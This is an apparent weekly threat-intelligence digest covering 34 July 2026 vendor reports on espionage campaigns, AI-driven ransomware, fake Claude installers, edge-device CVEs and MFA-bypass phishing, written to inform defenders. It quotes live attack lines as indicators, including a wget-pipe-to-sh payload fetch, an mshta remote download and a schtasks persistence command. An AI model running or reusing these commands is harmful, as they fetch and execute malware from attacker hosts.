The Indicator — Threat Intelligence Digest

Weekly Threat Intel
July 17–24, 2026

Published July 24, 2026 | Based on 34 IOC reports | TLP: CLEAR
34 Reports analyzed
1,675 IOCs extracted
10 Reports from one vendor in a single day
3 Unrelated Rust-based ransomware/RAT payloads
2 Vendors independently tracking one shared C2 domain
Key Takeaways for Security Professionals
  • Hunt the StrikeReady batch's domains and hashes across your telemetry, not just read them.

    One vendor released ten reports in a single day spanning a Bitter/Sidewinder South Asian espionage triad and four Russia-nexus campaigns against Ukraine. Treat the full domain and hash list as an immediate hunting package, not background reading.

  • Alert on mshta.exe launched from an LNK inside a RAR — no macro required.

    The Armageddon-style campaign drops a RAR containing an LNK that fires mshta.exe only after mouse movement inside a decoy HTML page, defeating sandboxes that don't simulate user interaction.

  • Treat autonomous AI ransomware as a live detection-strategy shift, not a novelty.

    Trend Micro confirmed the first documented case of a fully AI-driven ransomware attack, reusing the same Langflow/Nacos CVEs and C2 IP as last week's JADEPUFFER report — this is that campaign, now formally attributed.

  • Only download Claude Desktop from claude.ai/download — never an artifact link.

    FakeAgent malvertising serves a fake Claude Desktop installer through a shared Claude Artifact URL, then sideloads SectopRAT via a convincing jcef_helper.exe/libcef.dll pair and an EdgeUpdate-masquerading scheduled task.

  • Patch SonicWall SMA1000 and Geoserver today — both face active exploitation.

    CVE-2026-15409 and CVE-2026-15410 grant unauthenticated root on SMA1000 appliances; CVE-2024-36401 in Geoserver is being mass-exploited by the Rondo botnet. Both have public proof-of-concept exploit code.

  • Hunt cloudlanecdn[.]com and logAzure.txt — the same C2 under two campaign names.

    Group-IB's HOLLOWGRAPH and Securelist's Project CAV3RN share an identical C2 domain and config filename, both abusing Microsoft 365 calendars and the Graph API for C2 — likely one actor tracked independently by two vendors.

  • Require phishing-resistant MFA or block OAuth device-code approval flows outright.

    Three separate reports this week — Kali365, Trend Micro, and LSHIY — show device-code phishing and ROPC-based password spraying both bypassing MFA at scale against Microsoft 365 and Azure CLI.

This week's 34 reports and 1,675 IOCs — both the largest weekly totals of the year so far — are dominated by a single publishing event: StrikeReady released ten separate reports within three minutes of each other on July 18, splitting cleanly into a South Asian espionage triad (Bitter, Sidewinder, and an ELF-malware campaign against the Indian government) and four Russia-nexus operations against Ukraine. Beyond that dump, the week's most consequential story is confirmation rather than discovery: Trend Micro formally documented the first fully autonomous, AI-driven ransomware attack — the same campaign, same CVEs, same C2 IP as last week's JADEPUFFER report, now attributed and named. Claude-brand abuse continued into a third week via a malvertised fake Claude Desktop installer, federal agencies warned of ongoing PLC exploitation against U.S. critical infrastructure, three unrelated malware families converged independently on Rust, and two vendors turned out to be tracking the exact same Microsoft 365 calendar-abuse campaign under two different names without realizing it.
01 — TOP STORY

One Vendor, Ten Reports — A South Asian Espionage Triad

At 02:00–02:03 UTC on July 18, StrikeReady published ten threat intelligence reports in immediate succession. Four of them chart a persistent South Asian-focused espionage complex; the other six (covered in Section 2) track Russia-nexus activity against Ukraine. Together they account for 941 of this week's 1,675 IOCs — well over half the week's total from a single organization's single publishing run.

Bitter APT — Open Directory Espionage — 322 IOCs

Bitter APT Runs Its Espionage Kit Off Misconfigured, Open-Directory Servers

StrikeReady's largest report of the week (322 IOCs) tracks Bitter APT using obscure archive formats and encrypted payloads staged on misconfigured, publicly browsable servers — including libraofficeonline[.]com and a C2 at oraclewebonline[.]com/log.php backed by 176[.]124[.]33[.]42:443. The kit combines a custom ORCPBackdoor, browser credential stealers (schs.exe), and screenshot utilities (sstn.exe) that write commands to C:\Users\[user]\AppData\Roaming\commands.txt and exfiltrate to C:\Users\Public\Documents\ats.

322 IOCs · ORCPBackdoor · Open-directory C2 staging · Browser stealer + screenshot components
Sidewinder — Pakistani Government/Military Lures — 185 IOCs

Sidewinder's Infrastructure Hunt Surfaces Pakistani Navy and Police Lure Documents

A companion infrastructure-tracking report (185 IOCs) used daily hunting and multi-vendor pivoting to map Sidewinder's document lures, several referencing specific Pakistani government and military targets by name: mofa-gov-pk.donwloaded[.]com, paknavy.defpak[.]org, mail-dmp-navy-pk.dytt88[.]org, and a typosquat of the Punjab Police domain themed around "SOP for Security of Foreigners and Chinese." The lure filenames — DMP (Navy) Visit.docx, Leakage of Sensitive Data on Dark Web.docx — read as a target list in themselves.

185 IOCs · Pakistani govt/military-themed lures · NGINX open-directory pivoting · Multi-vendor hunting methodology
BITTER APT — CARA + OSINT Correlation — 142 IOCs

A Second Bitter Report Adds Scheduled-Task Persistence and a CHM Lure

A separate BITTER analysis (142 IOCs) used StrikeReady's CARA tooling plus OSINT to independently correlate malicious files and C2 infrastructure, surfacing a schtasks /create /tn DriverUpdates /f /sc minute /mo 15 persistence pattern, a CHM-file lure disguised as a project application, and an exfiltration chain that runs systeminfo/tasklist/directory listings into desk.txt before POSTing it to commonlifesupport[.]com/ssu.php.

142 IOCs · CHM lure · Scheduled-task persistence (15-min interval) · Recon-to-exfil via desk.txt
ELF Malware — Indian Government — USB Exfiltration — 75 IOCs

An ELF Malware Campaign Against Indian Government Targets Hunts USB Drives

Rounding out the South Asian cluster, a 75-IOC report tracks an email-delivered ELF malware campaign against the Indian government that stages further payloads specifically to exfiltrate data from connected USB drives — a technique aimed at air-gapped or removable-media workflows common in government environments.

75 IOCs · Email delivery · ELF/Linux payload · USB drive exfiltration staging

Whether Bitter and Sidewinder are being tracked together by design or coincidence, the practical takeaway is the same: this is a hunting package, not a reading assignment. All four reports share the same publication window and a StrikeReady contact address, and collectively name dozens of domains, hundreds of hashes, and specific lure filenames tied to Pakistani government and Indian government targets. Organizations in South Asia, or with staff who correspond with South Asian government or military contacts, should sweep mail and endpoint telemetry against this batch immediately rather than treating it as background reading.

02 — RUSSIA-NEXUS

The Same Batch's Other Half: Four Russia-Nexus Campaigns Against Ukraine

The remaining six reports from StrikeReady's July 18 batch track Russia-nexus activity; four of them focus specifically on Ukraine, continuing a throughline from the past several weeks' digests.

Armageddon/Gamaredon-style — Mouse-Movement HTML Trick — 119 IOCs

A Ukrainian Legal-Themed Lure Only Fires Its Payload After Mouse Movement

The week's most technically distinctive Russia-nexus report (119 IOCs) tracks a phishing document themed around Ukrainian administrative-liability proceedings that delivers an .xhtml file, then a RAR containing an LNK. The LNK's execution command — mshta.exe http://185.225.19[.]69/gm/decency.zip — only fires after the victim moves their mouse inside the decoy HTML, a sandbox-evasion trick that also uses a 1x1-pixel tracking image to confirm a human opened the file before the payload stage begins.

119 IOCs · Mouse-movement-gated HTML · mshta.exe execution · 1px tracking pixel confirms human interaction
unc3707 — UKR.net Phishing Infrastructure — 46 IOCs

unc3707 Builds Out UKR.net-Impersonating Infrastructure and a Disinformation Domain

Infrastructure hunting on unc3707 (46 IOCs) mapped phishing domains impersonating Ukraine's UKR.net webmail service (ukr-setting[.]com, uukkrr[.]net) hosted on 82[.]221[.]139[.]160 (AS50613), alongside a separate disinformation-themed domain, ukraine-story[.]com, suggesting the same infrastructure or actor supports both credential theft and narrative operations.

46 IOCs · UKR.net-impersonating phishing domains · AS50613 hosting · Companion disinformation domain
Russia-Nexus — Ukrainian Economy Sector — 41 IOCs

Small-Attachment Phishing Targets Ukraine's Economy Sector to Dodge Filters

A separate campaign (41 IOCs) deliberately uses small email attachments to bypass size- and behavior-based detection, delivering a decoy PDF and a credential-harvesting page at changepassword-ukr[.]net/desktop/security/login/ against Ukrainian economy-sector targets.

41 IOCs · Small-attachment evasion · Credential phishing · Ukrainian economy sector focus
Roundcube XSS — CVE-2023-47272 — Polish Target — 11 IOCs

A Suspected Russian Actor Steals a Polish Entity's Email via a .txt File XSS

A smaller but notable report (11 IOCs) documents a suspected Russian threat actor exploiting Roundcube's CVE-2023-47272 XSS vulnerability against a Polish entity using a malicious .txt attachment, then exfiltrating emails and address books through a dedicated tracking domain, rcstat[.]com.

11 IOCs · CVE-2023-47272 · .txt-file XSS trigger · Full mailbox + address book exfiltration

Four distinct Russia-nexus operations against Ukraine in one publishing batch, spanning webmail phishing, economy-sector credential theft, mail-server exploitation, and a sandbox-evading HTML trick, confirm sustained multi-pronged pressure rather than a single campaign. Defenders supporting Ukrainian organizations, or any organization running Roundcube webmail, should check for the rcstat[.]com and UKR.net-impersonating indicators specifically, and treat any unexpected LNK-inside-RAR delivery as a live technique regardless of whether a sandbox reports it as benign.

03 — AGENTIC AI

AI Keeps Escalating: Autonomous Ransomware Confirmed, Claude Desktop Faked

Last week's digest closed with two reports describing AI directly operating offensive infrastructure for the first time. This week brings formal confirmation of one of them, plus a third week of attackers trading on trust in the Claude brand — this time via malvertising rather than ClickFix.

Confirmed: First Documented Autonomous AI Ransomware

Trend Micro Formally Confirms the First Fully Autonomous AI Ransomware Attack

A five-IOC report from Trend Micro documents what it calls the first documented case of an AI agent autonomously executing a complete ransomware attack — and the indicators match last week's JADEPUFFER report exactly: initial access via CVE-2025-3248 (Langflow), privilege escalation via CVE-2021-29441 (Nacos), and a C2 beacon at 45[.]131[.]66[.]106. This is JADEPUFFER, now formally named and attributed as the first confirmed case of its kind, with Trend Micro's assessment centered on shifting defense from indicator-based to behavior-based detection.

5 IOCs · Same CVEs + C2 IP as last week's JADEPUFFER · First formally confirmed autonomous AI ransomware case
FakeAgent — Fake Claude Desktop — Malvertising — 41 IOCs

FakeAgent Malvertises a Fake Claude Desktop App Straight From a Claude Artifact URL

Huntress tracked a malvertising campaign (41 IOCs) that hosts its fake download page at a real claude[.]ai/public/artifacts/ URL before redirecting to a lookalike, claude.ai.download-app[.]us. The resulting ClaudeDesktop.exe sideloads SectopRAT via a legitimate-looking jcef_helper.exe/libcef.dll pair, persists as a scheduled task disguised as DockerDesktop.exe, and drops a secondary implant at %APPDATA%\Roaming\Microsoft\EdgeUpdate\Install\sslconf.exe to blend into legitimate Edge update infrastructure.

41 IOCs · Claude Artifact URL as initial host · DLL sideloading → SectopRAT · EdgeUpdate-masquerading persistence
TELEPUZ — ClickFix Persists — 76 IOCs

TELEPUZ's ClickFix-to-Vidar Chain Gets a Second, Independent Write-Up

A second, independent report (76 IOCs) on TELEPUZ — the modular malware-as-a-service platform covered last week by Elastic — confirms the ClickFix-to-Vidar delivery chain remains active a week later, reinforcing that this isn't a one-off campaign but an ongoing MaaS operation with staying power.

76 IOCs · ClickFix → Vidar → TELEPUZ · Independent confirmation of an active, ongoing MaaS operation

The most consequential story here is confirmation, not novelty: an AI agent running a ransomware operation start to finish is no longer a single vendor's early read on a single incident, it's Trend Micro's formally documented "first" of its kind. Meanwhile, the FakeAgent campaign shows Claude-brand abuse evolving its delivery mechanism for a third straight week — from ClickFix paste-and-run commands to a malvertised installer hosted at a genuine Claude Artifact URL. Verify any Claude Desktop download originates directly from claude.ai/download, and build detections around AI-operated attack behavior (rapid, adaptive kill-chain execution without the pauses a human operator would introduce) rather than any single payload signature.

04 — CRITICAL INFRASTRUCTURE

Critical Infrastructure and the Edge Under Siege

Four reports this week hit the edge and operational technology layer directly — a federal warning on internet-facing PLCs, a destructive backdoor combining wiping and ransomware, and two actively exploited edge-device vulnerabilities with public proof-of-concept code.

PLC Exploitation — Federal Warning — 46 IOCs

Federal Agencies Warn of Ongoing PLC Exploitation Using Legitimate Engineering Software

A 46-IOC report cites federal agency warnings of ongoing exploitation against internet-facing programmable logic controllers in U.S. critical infrastructure, with attackers using legitimate engineering software to manipulate control logic and operator displays directly rather than deploying custom exploit code. C2 infrastructure includes 185[.]82[.]73[.]175 and domains tylarion867mino[.]com and ocferda[.]com, alongside a hash for the known IOCONTROL Linux ICS backdoor family.

46 IOCs · Internet-facing PLCs · Legitimate engineering software abuse · IOCONTROL backdoor hash present
GigaWiper / BLUERABBIT — Wipe + Encrypt — 13 IOCs

GigaWiper Combines Disk Wiping, File Encryption, and Remote Control in One Go Backdoor

GigaWiper, also tracked as BLUERABBIT (13 IOCs), is a Go-based backdoor built around RabbitMQ and Redis for remote control, capable of both wiping disks outright and encrypting files — a destruction-first design rather than a pure extortion play. It persists via HKCU\SOFTWARE\OneDrive\Environment and beacons to 185[.]182[.]193[.]21:5544.

13 IOCs · Go-based · RabbitMQ/Redis C2 · Combined wipe + encrypt capability
SonicWall SMA1000 — Two Zero-Days — 7 IOCs

Two SonicWall SMA1000 Zero-Days Chain to Unauthenticated Root

CVE-2026-15409 (SSRF) and CVE-2026-15410 (code injection) in SonicWall SMA1000 appliances chain together to grant unauthenticated root access via a rogue API route written to /var/lib/unit/conf.json. Attacker infrastructure traces to ASN 206092, and a public proof-of-concept is already on GitHub, meaning the exploitation window is wide open for any unpatched appliance.

7 IOCs · CVE-2026-15409/15410 · Unauthenticated root via rogue API route · Public PoC available
Rondo Botnet — Geoserver — 5 IOCs

The Rondo Botnet Mass-Exploits a Two-Year-Old Geoserver RCE

A small but sharp report (5 IOCs) tracks the Rondo botnet exploiting CVE-2024-36401, a Geoserver XPath evaluation vulnerability, to run a shell one-liner (wget -qO- http://45.153.34.153/rondo.zyt.sh|sh) that pulls and executes a payload from 45[.]153[.]34[.]153 — another reminder that a two-year-old, publicly patched bug is still enough for automated mass exploitation.

5 IOCs · CVE-2024-36401 · Automated wget/curl/busybox payload fetch · Botnet-scale exploitation

None of this week's edge and OT stories required a novel technique — they required an unpatched device. Two of the four vulnerabilities named here (SonicWall SMA1000, Geoserver) already have public exploit code, meaning the gap between disclosure and mass exploitation is now measured in the time it takes a botnet operator to update a script. Prioritize SonicWall SMA1000 and any internet-facing Geoserver instance for immediate patching, and treat any internet-facing PLC or engineering workstation as requiring the same network segmentation discipline as a domain controller.

05 — RANSOMWARE

Ransomware Roundup: Three Unrelated Rust Payloads in One Week

Three separate ransomware and RAT reports this week are written in Rust — a language increasingly favored by malware authors for its cross-platform compilation and comparatively weak coverage in legacy static-analysis tooling. None of the three appear related to each other.

Payload Type Access / C2 Notable
INC (47 IOCs) Rust-based RaaS, 800+ victims since 2023 Citrix NetScaler, FortiClient, SimpleHelp, CitrixBleed 2 edge CVEs
Spirals (31 IOCs) Rust-based ransomware, South Asia IT services ASP.NET webshells → PsExec network-wide deployment
msaRAT / Chaos (10 IOCs) Rust-based RAT (not a locker) Chrome DevTools Protocol + WebRTC "living off the browser" C2
INC Ransomware — Rust RaaS — 800+ Victims

INC's Rust-Based RaaS Keeps Exploiting the Same Edge Device CVE Category

INC (47 IOCs), a Rust-based ransomware-as-a-service platform with over 800 claimed victims since 2023, continues exploiting public-facing edge devices — Citrix NetScaler (CVE-2023-3519), FortiClient (CVE-2023-48788), SimpleHelp (CVE-2024-57727), and CitrixBleed 2 (CVE-2025-5777) — before deploying a toolkit of ipscan.exe, pskill.exe, and a Veeam credential-dumping PowerShell script, and posting victims to a Tor leak site.

47 IOCs · 4 edge-device CVEs · Veeam credential dumper · Tor leak site
Spirals — South Asian IT Services — 31 IOCs

Spirals Ransomware Targets South Asian IT Services via Webshell-to-PsExec

Spirals (31 IOCs), also Rust-based, targets IT services organizations in South Asia specifically, using ASP.NET webshells for initial access before pivoting to PsExec for rapid, network-wide ransomware deployment — a fast, noisy technique that favors speed over stealth.

31 IOCs · ASP.NET webshell initial access · PsExec network-wide push · South Asian IT services sector
Chaos / msaRAT — Living Off the Browser — 10 IOCs

Chaos Ransomware's New msaRAT Uses Chrome DevTools and WebRTC as Covert C2

Cisco Talos documented msaRAT (10 IOCs), a new Rust-based RAT tied to the Chaos ransomware group that uses the Chrome DevTools Protocol combined with WebRTC — signaling through Cloudflare Workers and STUN/TURN servers — to build a covert C2 channel that rides entirely on browser-native protocols, making it far harder to distinguish from legitimate video-call or remote-debugging traffic.

10 IOCs · Chrome DevTools Protocol C2 · WebRTC via Cloudflare Workers signaling · Chaos ransomware-linked

Three independent malware authors converging on Rust in the same week isn't coordination, it's a trend line — and msaRAT's browser-native C2 is the more novel engineering problem of the two. Rust payloads compile cleanly to Windows, Linux, and macOS from one codebase and frequently under-trigger legacy signature engines tuned for C/C++ and .NET. For msaRAT specifically, monitoring needs to extend to Chrome DevTools Protocol connections and unexpected WebRTC/STUN/TURN traffic originating from processes that shouldn't be making video calls.

06 — IDENTITY

Same C2, Two Names: An M365 Calendar Backdoor and a Device-Code Phishing Wave

Two reports published days apart by different vendors turn out to describe the same infrastructure, and three more reports converge on a single technique class: abusing Microsoft's authentication flows rather than breaking them.

HOLLOWGRAPH & Project CAV3RN — Shared Infrastructure — 33 IOCs Combined

Group-IB's HOLLOWGRAPH and Securelist's Project CAV3RN Share a C2 Domain and Config File

Group-IB's HOLLOWGRAPH report (8 IOCs) and Kaspersky Securelist's Project CAV3RN report (25 IOCs), published independently, both name the domain cloudlanecdn[.]com and a configuration file called logAzure.txt. Both campaigns abuse the Microsoft Graph API and Outlook/M365 calendar events as a C2 channel, use DNS — AAAA records in CAV3RN's case — for configuration recovery, and reference possible links to Iran-nexus actors (HOLLOWGRAPH cites Lyceum-associated backdoor hashes; Securelist notes a possible OilRig connection). This reads as one operator's infrastructure independently discovered and named by two different research teams.

8 + 25 IOCs · Shared cloudlanecdn[.]com + logAzure.txt · M365 calendar/Graph API C2 · Possible Iran-nexus (Lyceum/OilRig)
Kali365 & Device Code Phishing — OAuth Abuse — 50 IOCs Combined

Two Reports, One Technique: Device-Code Phishing Bypasses MFA Without Touching a Password

Kali365 (34 IOCs) targets US organizations by abusing Microsoft's OAuth device-code authentication flow to steal tokens for M365 access, while a separate Trend Micro report (16 IOCs) documents the same underlying technique more broadly — tricking a victim into entering an attacker-generated device code on a legitimate Microsoft login page, which then hands the attacker a valid, MFA-satisfied session token without ever prompting for or capturing a password.

34 + 16 IOCs · OAuth 2.0 device-code flow abuse · No password ever captured · Valid, MFA-satisfied session token stolen
LSHIY — IPv6 Password Spraying — ROPC — 4 IOCs

LSHIY's Massive IPv6 Password Spray Uses ROPC to Bypass MFA on Azure CLI

Huntress observed a large-scale password spraying campaign (4 IOCs) against Microsoft's Azure CLI originating from IPv6 ranges controlled first by LSHIY LLC (2a0a:d683::/32) and later FranTech (2605:6400::/32), using the Resource Owner Password Credentials (ROPC) OAuth grant — a legacy flow that can succeed without triggering standard interactive MFA prompts.

4 IOCs · IPv6-sourced password spraying · ROPC grant abuse · Targets Azure CLI authentication

Four of this week's reports describe attackers working around MFA rather than through it, and the HOLLOWGRAPH/CAV3RN overlap is a reminder to always check new IOCs against your own historical hunt data before assuming a report is unrelated to something you've already seen. Disable or tightly restrict the OAuth device-code flow if your organization doesn't rely on it for legitimate device onboarding, block the ROPC grant type where possible in favor of interactive, phishing-resistant MFA, and add cloudlanecdn[.]com plus its four actor-controlled nameservers to watchlists regardless of which campaign name your tooling surfaces.

07 — ALSO WORTH TRACKING

Also Worth Tracking: Loaders, Stealers, Supply Chain, and Defender Tradecraft

JadeProx — China-Nexus — TriBack Loader — 68 IOCs

JadeProx Chains a TriBack Loader Into AdaptixC2 and Beagle Across SEA and LATAM

Group-IB's JadeProx report (68 IOCs) tracks a China-nexus operation using a custom TriBack Loader to deliver both AdaptixC2 and a Beagle backdoor against targets in Southeast Asia and Latin America via phishing and vulnerability exploitation, with a toolset including suo5 tunneling proxies and the nuclei scanning framework repurposed for offense.

68 IOCs · TriBack Loader → AdaptixC2 + Beagle · SEA and LATAM targeting
Exposed WebDAV Malware Lab — AI-Generated Lures — 87 IOCs

Rapid7 Finds an Exposed WebDAV Server Doubling as an AI-Assisted Malware Delivery Lab

Rapid7 documented (87 IOCs) an exposed WebDAV server being used as an active testing lab, chaining Windows internet-shortcut and MSHTML CVEs (CVE-2025-33053, CVE-2026-21513, CVE-2025-24054) with renamed living-off-the-land binaries — putty.exe shipped as route.exe — and evidence the operator used AI tooling to rapidly generate and iterate phishing lures.

87 IOCs · 3 chained CVEs · Renamed LOLBins · AI-assisted lure generation
CrashStealer, LabubaRAT & Fake Games — Masquerade Trio — 113 IOCs Combined

Three Unrelated Malware Families Each Hide Behind a Trusted Name This Week

CrashStealer (52 IOCs) disguises itself as Apple's CrashReporter utility to slip macOS Gatekeeper and steal credentials, crypto wallets, and files. LabubaRAT (14 IOCs) is a Rust-based RAT masquerading as NVIDIA software offered as a configurable MaaS. Separately, fake game downloads (47 IOCs) spread a RenPy Loader that uses MSBuild and EtherHiding to deliver Amatera Stealer.

52 + 14 + 47 IOCs · Fake CrashReporter, NVIDIA, and game installers · MaaS + EtherHiding delivery
Cruciferra Crypter — BYOVD + Process Ghosting — 8 IOCs

Cruciferra Crypter-as-a-Service Pairs BYOVD With Process Ghosting

Cruciferra (8 IOCs) is a commercial crypter service combining Bring-Your-Own-Vulnerable-Driver (BYOVD) techniques with process ghosting to hide commodity RATs and infostealers from endpoint defenses, complicating incident response for anything wrapped by the service regardless of the underlying payload.

8 IOCs · Crypter-as-a-Service · BYOVD · Process ghosting evasion
Supply Chain — RubyGems & Balbooa — 7 IOCs Combined

SleeperGem Hijacks Dormant RubyGems Accounts While a Balbooa Forms 0-Day Sees Active Exploitation

Aikido Security's SleeperGem campaign (4 IOCs) takes over dormant RubyGems maintainer accounts to inject malicious code into packages including git_credential_manager and Dendreo. Separately, a critical unauthenticated arbitrary file upload flaw in Balbooa Forms (CVE-2026-56291, 3 IOCs) is being actively exploited as a zero-day; the vendor's 2.4.1 patch should be applied immediately.

4 + 3 IOCs · Dormant-account RubyGems takeover · CVE-2026-56291 actively exploited zero-day
Defender Tradecraft — Hunting, Hygiene & Custom Feeds — 83 IOCs Combined

Three Methodology Posts Cover Hunting Unknowns, Dangling DNS, and Build-Your-Own Threat Feeds

StrikeReady published companion methodology posts on threat-hunting for "unknown unknowns" via outlier analysis (45 IOCs) and on dangling DNS hijacking risks from misconfigured records (22 IOCs), while Censys detailed building custom threat-intelligence feeds with example queries for ClickFix infrastructure, webshells, and vulnerable exposed services (16 IOCs) — all three useful references for SOC teams building out their own detection tooling rather than incident reports in themselves.

45 + 22 + 16 IOCs · Threat-hunting methodology · Dangling DNS hygiene · Custom Censys-based feeds

This week's secondary stories split evenly between attackers hiding behind trusted names and defenders building better tooling to find them anyway. Verify installer and package provenance before trusting any name — Apple, NVIDIA, a game studio, or a RubyGems maintainer who's been dormant for years — and consider the methodology posts here as a starting toolkit for building your own detection queries against this week's broader indicator set.

Analyst Assessment: July 17–24 in Context

The defining structural fact of this week is that one publisher's single-day output shaped the entire digest. StrikeReady's ten reports, published within a three-minute window, account for more than half this week's IOC volume and split cleanly into a South Asian espionage triad and a four-report Russia-Ukraine cluster. That volume doesn't make either story less real — the Pakistani government and military lure filenames in the Sidewinder report, and the sandbox-evading mouse-movement trick in the Armageddon-style Ukraine campaign, are both concrete, actionable findings — but it's a reminder that a single vendor's publishing cadence can dominate a week's threat landscape without reflecting a proportional shift in adversary activity.

The AI story moved from observation to confirmation. Last week's JADEPUFFER report described a fully autonomous ransomware kill chain; this week, Trend Micro formally documented it as the first confirmed case of its kind, using identical CVEs and C2 infrastructure. Paired with FakeAgent's malvertised fake Claude Desktop installer — the third consecutive week of Claude-brand abuse, now via a genuine Claude Artifact URL rather than a ClickFix lure — the pattern is consistent: AI is becoming both more capable as an attack operator and more frequently impersonated as a lure, sometimes in the same week's digest.

The HOLLOWGRAPH/Project CAV3RN overlap is the week's best analyst lesson. Two capable research teams independently found, named, and published on what appears to be the same infrastructure without cross-referencing each other's work, discoverable only by diffing raw indicator values. It's a concrete argument for maintaining your own historical IOC database and checking new reports against it, rather than trusting that any two named "campaigns" are necessarily distinct.

What to do now: (1) Hunt the full StrikeReady batch's domains and hashes — Bitter, Sidewinder, and the four Ukraine-focused reports — across mail and endpoint telemetry immediately. (2) Treat autonomous AI ransomware as a live category requiring behavior-based detection, not a hypothetical. (3) Verify any Claude Desktop installer originates from claude.ai/download directly, never a redirected artifact or malvertised link. (4) Patch SonicWall SMA1000 (CVE-2026-15409/15410) and any internet-facing Geoserver (CVE-2024-36401) immediately — both have public exploit code. (5) Disable or restrict the OAuth device-code flow and block the ROPC grant type where feasible; both were abused independently by three separate reports this week. (6) Add cloudlanecdn[.]com and its associated nameservers to watchlists regardless of whether your tooling labels it HOLLOWGRAPH or Project CAV3RN. (7) Verify hashes and publisher provenance on any installer claiming to be Apple, NVIDIA, or a known game before running it.

Sources

  1. StrikeReadyRattling the Cage of a Sidewinder
  2. StrikeReadyDon't Get Bitter About Being Targeted — Fight Back With the Help of the Community
  3. StrikeReadyOpen Sesame (Bitter APT Open-Directory Espionage)
  4. StrikeReadyThis ELF Is Not Your Buddy
  5. StrikeReadyArmageddon Is More Than a Grammy-Nominated Album
  6. StrikeReadyFinding the Unknown Unknowns, Part 2 (unc3707)
  7. StrikeReadyRussia-Nexus Actor Targets Ukraine
  8. StrikeReadyStealing Your Email With a .txt File
  9. StrikeReadyFinding the Unknown Unknowns, Part 1
  10. StrikeReadyProtecting Against Dangling DNS Hijacking Is More Than Good Hygiene
  11. Trend MicroFirst Documented Case of Fully Autonomous AI Ransomware
  12. HuntressFakeAgent: Claude Desktop Malvertising Ends in a .NET RAT
  13. Hive ProTELEPUZ: A Modular Malware-for-Hire Spreading Through ClickFix Tricks
  14. Trend MicroOngoing PLC Exploitation Against Critical Infrastructure
  15. Hive ProGigaWiper: The All-in-One Destruction Kit
  16. Hive ProSonicWall SMA1000 Zero-Days Under Active Exploitation
  17. SANS Internet Storm CenterRondo Botnet Exploits Geoserver
  18. Hive ProINC Ransomware: Rust-Based RaaS Exploiting Public-Facing Edge Devices
  19. Hive ProSpirals: The Ransomware That Doesn't Wait
  20. Cisco TalosChaos msaRAT: Living Off the Browser to Build a Covert C2 Channel
  21. Group-IBHOLLOWGRAPH: Microsoft 365 Calendars as Covert C2
  22. Kaspersky SecurelistProject CAV3RN: Cyberespionage Framework Using Outlook and DNS
  23. Any.RunKali365 Device Code Phishing Targeting US Organizations
  24. Trend MicroDevice Code Phishing: Bypassing MFA via OAuth
  25. HuntressTwist the Nozzle on Password Spraying: A Tradecraft Tuesday Recap
  26. Group-IBJadeProx: China-Nexus Operation Using TriBack Loader
  27. Rapid7Exposed WebDAV Server Doubles as a Malware Delivery Lab
  28. Hive ProSigned, Sealed, Stolen: CrashStealer Slips Past Gatekeeper
  29. Hive ProLabubaRAT: A Rust-Based Remote Access Framework
  30. MalwarebytesFake Games Spread Stealers With RenPy Loader, MSBuild, and EtherHiding
  31. CyberPressCruciferra Crypter Evades Detection
  32. Aikido SecuritySleeperGem: RubyGems Supply Chain Attack
  33. Hive ProCVE-2026-56291: Balbooa Forms File Upload Flaw Actively Exploited
  34. CensysCensys Is the Omnifeed: Crunch Your Own Threat Intelligence

This digest was generated with Claude by Anthropic, based on source reporting from the publications listed above and analysis of 34 IOC submissions to iocget.com between July 17 and July 24, 2026.